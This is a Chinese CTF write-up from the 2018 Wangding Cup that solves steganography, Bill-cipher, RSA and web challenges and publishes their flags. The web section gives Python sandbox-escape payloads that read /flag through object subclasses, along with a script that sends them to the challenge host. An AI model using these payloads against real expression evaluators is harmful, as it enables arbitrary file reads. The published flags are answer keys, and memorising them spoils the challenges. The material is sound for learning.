Misc部分:

套娃

下载下来解压,一共六层文件夹,每层一张图片

其实前面五张都没啥用,只有第六张有用

第六张考的是BGR的LSB隐写,有两种解法
第一种,用Stegsolve来解题


第二种方法是使用一个神器zsteg
zsteg的安装非常简单,在linux下

1
gem install zsteg


然后用如下命令可以查看zsteg的用法

1
zsteg -h

这道题我们用这个工具,可以直接傻瓜式的解出来:

1
zsteg 6.png


得到flag

1
flag{03a253f5-8e93-4533-bcfc-af908830095d}

BILL

题目给了一串奇怪的字符串

1
2
   wpmio hzmxdgznn gzbdngvopmz mzopmizy pirvmmviovwgz lpvmozmdib, gzbdngvodqz znovwgdnc bdqdib qjdxz xjhkgzoz yzkjndojmt qvgpvwgz cjgy rjmfn epmdnydxodji, rjmfn epybzn wzvm wjydzn epno lpvmozmdib ajmhdyvwgz pivxfijrgzybzy vmhdzn ziodogz cvmvnn bdqdib gdwzmot rvbdib fijri xjixgpyz gzqt ovfzi omjjkn yzndbi kvodzio yjhznodx pivgdzivwgz fijri zsoziy mzkzvozy rjpgy mpgzm kmjozxodib vaazxozy cdnojmt wzbpi, bjqzmihzio rjmfn cjgy fzko vaazxozy xvpnzn ziyjrzy diznodhvwgz ijo ajmhdyvwgz, zszxpodjizmn izxznnvmt, bjqzmihzio, vgozm diqznozy rvmavmz kpwgdx vi vit epybzn bpvmyn jixz kzjkgz fdiymzy pigznn bjqzmihzio gzqt bpvmyn lpvmozmdib, gdbco zigvmbdib vnnzio xcvmvxozm izdbcwjmdib odzn kmdixdkgzn diqvmdvwgt fdiymzy yznjgvodji vpocjmdot avodbpdib admh jkdidjin, odhzn mpgz hpmyzm fdiymzy zhdbmvodji wjpiyvmdzn diqznozy npkkjmo fdiymzy jiz zvxc ivodqz bjjy fijri gzo zskjnzy rczizqzm piado xvggzy qvgpvwgz ajmhn ocdn hzi lpvmozmdib mzno pigznn nvqvbzn amjh hpmyzm mzopmizy, nzxpmdot diznodhvwgz hzmxzivmdzn epno ijo qjdxz oj wztjiy yznompxodji xdoduzin xjinzio ntnozhn mzymznn, piyzm izbgzxozy amzz xjiomvxo ivodqz rjmfn qvgpvwgz cphwgz jwnompxozy npkmzhz, jigt qjdxz cvoc fdiymzy epno lpvmozmdib rczi xjiepmzy jkkmznndjin ydnnjgqz ydnnjgqz ja ajmhzm cjpnzn mzno joczmn hjno hvyz, nzszn azggjr lpvmozmdib, rczmzwt lpvmozmdib epybzn ydnomdxon cvmvnn kvnn, gdqzn epnodxz poozmgt qjdxz ajmhzm wpmio gzbdngvopmz hzi dhhzydvoz lpvmozmdib ja lpvmozmdib ojovggt kmznzio jwnompxodib bjjy cjgy, pivgdzivwgz kmjqz novodji di oczmzajmz nzkvmvoz qjdxz dinodopozy lpvmozmdib, kmjozxodib ivopmvgdudib epmdnydxodji mzxjmyn, qjdxz nzkvmvoz qvgpvwgz yznomjtzy xcvmvxozm izbgzxozy hpmyzm kpidnchzio, npaazmvwgz, hzmxdgznn oczh, omdzy wzxjhzn ijo epnodxz ydmzxo gzqt, fijri zvxc vwydxvozy, vkkzvgdib bdqdib, cdnojmt wzbpi diznodhvwgz mzapnzy dizqdovwgt piydnodibpdnczy wjpiyvmdzn.
fgal{df3e46bd64c55ac06477b5388452859bc107ca9526e1b8533a56344d3e8e2c1a9b60e1dc2a5a96}

最后一行很明显和flag有关,似乎顺序有些混乱
先将除了最后一行的拿去凯撒移位试试,直接列出所有组合

然后发现有一种组合是正常的英文

1
burnt merciless legislature returned unwarrantable quartering, legislative establish giving voice complete depository valuable hold works jurisdiction, works judges bear bodies just quartering formidable unacknowledged armies entitle harass giving liberty waging known conclude levy taken troops design patient domestic unalienable known extend repeated would ruler protecting affected history begun, government works hold kept affected causes endowed inestimable not formidable, executioners necessary, government, alter invested warfare public an any judges guards once people kindred unless government levy guards quartering, light enlarging assent character neighboring ties principles invariably kindred desolation authority fatiguing firm opinions, times rule murder kindred emigration boundaries invested support kindred one each native good known let exposed whenever unfit called valuable forms this men quartering rest unless savages from murder returned, security inestimable mercenaries just not voice to beyond destruction citizens consent systems redress, under neglected free contract native works valuable humble obstructed supreme, only voice hath kindred just quartering when conjured oppressions dissolve dissolve of former houses rest others most made, sexes fellow quartering, whereby quartering judges districts harass pass, lives justice utterly voice former burnt legislature men immediate quartering of quartering totally present obstructing good hold, unalienable prove station in therefore separate voice instituted quartering, protecting naturalizing jurisdiction records, voice separate valuable destroyed character neglected murder punishment, sufferable, merciless them, tried becomes not justice direct levy, known each abdicated, appealing giving, history begun inestimable refused inevitably undistinguished boundaries.

结合题目名称我们可以猜测这道题考的是比尔密码,关于比尔密码,可以参考维基百科:https://zh.wikipedia.org/wiki/%E6%AF%94%E5%B0%94%E5%AF%86%E7%A0%81

如果是比尔密码的话,那么这段英文每个单词的首字母连起来就是密钥,下面的很像flag的东西就是密文
先使用脚本提取密钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#encoding:utf-8
file = open('text.txt', 'r')
lines = file.readlines()
list = []
for line in lines:
list += line.split(' ')
print '===========单个单词分割完成============='

str = []
for word in list:
str += word[0:1]
print "===========首字母提取成功==============="
string = "".join(str)
print string

得到密钥如下:

1
bmlruqlegvcdvhwjwjbbjqfuaehglwkclttdpdukerwrpahbgwhkaceinfengaiwpaajgopkuglgqleacntpikdaffotrmkebiskoengklewucvftmqrusfmrsimjnvtbdccsrunfcnwvhosovhkjqwcoddofhrommsfqwqjdhpljuvfblmiqoqtpoghupsitsviqpnjrvsvdcnmpsmttbnjdlkeaaghbiriub

然后写脚本解密

1
2
3
4
5
6
7
8
key="bmlruqlegvcdvhwjwjbbjqfuaehglwkclttdpdukerwrpahbgwhkaceinfengaiwpaajgopkuglgqleacntpikdaffotrmkebiskoengklewucvftmqrusfmrsimjnvtbdccsrunfcnwvhosovhkjqwcoddofhrommsfqwqjdhpljuvfblmiqoqtpoghupsitsviqpnjrvsvdcnmpsmttbnjdlkeaaghbiriub"
plain_text='df3e46bd64c55ac06477b5388452859bc107ca9526e1b8533a56344d3e8e2c1a9b60e1dc2a5a96'
list = []
for num in range(0,39):
hex_num=plain_text[2*num]+plain_text[2*num+1]
int_num=int(hex_num,16)
list.append(key[int_num])
print "".join(list)


得到flag

1
flag{hippopotomonstrosesquippedaliophobiawow}

Web部分

calc


然后在url后面加任意路径会出现python的报错,应该是考的python沙箱逃逸
可以参考ctf-wiki总结的python沙箱逃逸:https://ctf-wiki.github.io/ctf-wiki/pwn/sandbox/python-sandbox-escape/

1
0+0+ord(().__class__.__bases__[0].__subclasses__()[40](r"/flag").read()[0])

这样可以读出flag单个字符的ascii码值
然后通过如下脚本获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import re
rs = requests.session()
url = "http://3ec734df4e344b51afa37d0e44cdd1fc1842648aafa04af4.game.ichunqiu.com/"
xsrf = rs.get(url).cookies['_xsrf']
cookies = dict(_xsrf=xsrf)
flag = []
for i in range(0,43):
payload = '0+0+ord(().__class__.__bases__[0].__subclasses__()[40](r"/flag").read()[%d])' % i
data = {'expr': payload,'_xsrf':xsrf}
html = rs.post(url,data=data,cookies=cookies).text
pattern = re.compile(r'\d+')
res = re.findall(pattern,html)
count = 0
c = res[19]
flag.append(chr(int(c)))

print ''.join(flag)

当然这样做比较麻烦,后面看其它大佬的write up,发现用如下payload可以直接得到flag

1
1+1+int(([].__class__.__base__.__subclasses__()[40](‘/flag’,’r’).read()).encode(‘utf-8’),16)

Crypto

babyrsa

下载文件,用编辑器打开

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
d = 171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289

n = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357

e = 65537


enc = ICCHhzayltixzeuA++PPbDwlialEjQuDBx38ecgQwl5lOTnemrcWYbDeQkIIE5oPQOcSmNX8nmcD
gyl4O05jYD7VmDcgwQTIgHeOLovcqGVPHEW4hHSmIR3BB/CBjb3/5+HfeifXF1w+/o148o76D9Nt
TBYaLk8CTjOscT23PBI8w+WPhHBIPaSbJlDuaHA4Ie6ojsE6mM7cp79dz7bCdAf5a2tUGA6AbNCu
P1WVnsBI+IIHX8EDELmBnQ5c13JuYnjHL5lmqL3QK88QwQQ4h/3vUODAWBuzn8meWBgfpqxmHTGJ
+du2mRoUTpUBzZy2OxrKdD8J11Hc+yJJJkQe5QgqACbM00K0rTv7kIyB2aB/gUGLNP4IOwV09avU
pzLS2PPLgeAVP/JSGYlXZTthy4FlqL5pMN4/+swNnEN6Z+lPzLNe0JB0uNN/yPJ3C3lsSuoFLh0I
nYI46Tycs8vz1nHQWjQdE6hpD/HpyCbjoC2BE4ugCJKUtmp7mbyDxkjkn5ZkHhrJXK/DF4NQgYmf
kZxyLOWsI2UC1niq5qGD3SIspW8NcupyGakYVzD1R9PP8xoxpkjX62f7myXLMmacbJgYe7ExeWdY
XMZd76Tnqu9IJJwEO43LZz+w2rqH8DIlhr64JenxaDcIixqFzKmkk6WK71VVT3t788ZxaNhG2yo=

给了d,n,e和密文enc,求出明文应该就是flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#encoding:utf-8
import base64
c = base64.decodestring("ICCHhzayltixzeuA++PPbDwlialEjQuDBx38ecgQwl5lOTnemrcWYbDeQkIIE5oPQOcSmNX8nmcDgyl4O05jYD7VmDcgwQTIgHeOLovcqGVPHEW4hHSmIR3BB/CBjb3/5+HfeifXF1w+/o148o76D9NtTBYaLk8CTjOscT23PBI8w+WPhHBIPaSbJlDuaHA4Ie6ojsE6mM7cp79dz7bCdAf5a2tUGA6AbNCuP1WVnsBI+IIHX8EDELmBnQ5c13JuYnjHL5lmqL3QK88QwQQ4h/3vUODAWBuzn8meWBgfpqxmHTGJ+du2mRoUTpUBzZy2OxrKdD8J11Hc+yJJJkQe5QgqACbM00K0rTv7kIyB2aB/gUGLNP4IOwV09avUpzLS2PPLgeAVP/JSGYlXZTthy4FlqL5pMN4/+swNnEN6Z+lPzLNe0JB0uNN/yPJ3C3lsSuoFLh0InYI46Tycs8vz1nHQWjQdE6hpD/HpyCbjoC2BE4ugCJKUtmp7mbyDxkjkn5ZkHhrJXK/DF4NQgYmfkZxyLOWsI2UC1niq5qGD3SIspW8NcupyGakYVzD1R9PP8xoxpkjX62f7myXLMmacbJgYe7ExeWdYXMZd76Tnqu9IJJwEO43LZz+w2rqH8DIlhr64JenxaDcIixqFzKmkk6WK71VVT3t788ZxaNhG2yo=").encode('hex')

d =171667543985758425014232627985840717336387122108163758500542139626729279212540485673813409388397427405892256280730752710530037468765259171638824687119216443453078833931370749271396524300663719786871097595637432285751800013612137436020725492852419342272435212733486026753609513054804440530485467017884797272879406284689903095072725307517165288748564887361729738358011463377509622604034612759898436024272853796444439505507110804160400608180412245257162062494766079887998276493727771202445125297118556385657613871902180087388189988280105656191733965985878495407148701887047735812018200868151321246119065258205755102189932618492331181731032930671506379119003614308043854723142913145153824556828017544028126772950732350030371733003652817854070184981540813302478821473998511699291112000260313162924676245915026226201977284465842505256191235822318812659628683043195357384607192367037650400361829016395922074065034014120534209020328864830006606839179592932609256661738193663329776230050481312159600570791315455079679469956882283489829258240404557309270261381865785081719442470884775430068193960751589033994677379472095235901602941733635505402949964622214247924792042997962235246007680923289071880896909708764598890244005005286926994431628289
N = 365848589691553391654453815696801609393691558975114732077589431735072735814004481321693204054611153742844719038444697593327493027785795731389621927670788503335861977736740530534583572225955976966446771693720421426616666151538067479984725761741317847115913974275314572559550814811157603376899910638368755166255776849626761808720772583206050387900451906315871548607212450421821284358760939660687558588799753487824506759639032283177034815892289194765173975342074810666614953387403646634191147782168926568900983361174986224868620163303631776464544385042160475855173792780028858673004579549168611488908206940265042017827224145445864849990033230038346962998044409425059655414595541354712964867076540952852074402602485254837693009606256646491881886402251519107628767780560029195077356603998621239496833842620813594476086809217145741837067697701029006079475655230057641122885601163764359304119539318186498359110652713132230601632984636292710845264886583673643096710521658506038045125724977714211793704349604343253187208130136333839351343850952892593409667791896415744436543839302830842902421646274217466522255794836216649020356914498443158290307092169834254304137975684324590877396301465368942446331758175055737212871262544202124864201404357
e = 65537

def egcd(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)

def modinv(a, m):
g, x, y = egcd(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m

ccc=int(c,16)
m = pow(ccc,d,N)

print hex(m)[3:-1].decode('hex')
#flag{w3lC0M3_t0_rS4_w0RlD}

得到flag

1
flag{w3lC0M3_t0_rS4_w0RlD}

最后更新: 2018年08月23日 18:35

原始链接: http://drac0nids.top/2018/08/22/网鼎杯部第二场部分WriteUp/

× 请我吃糖~
打赏二维码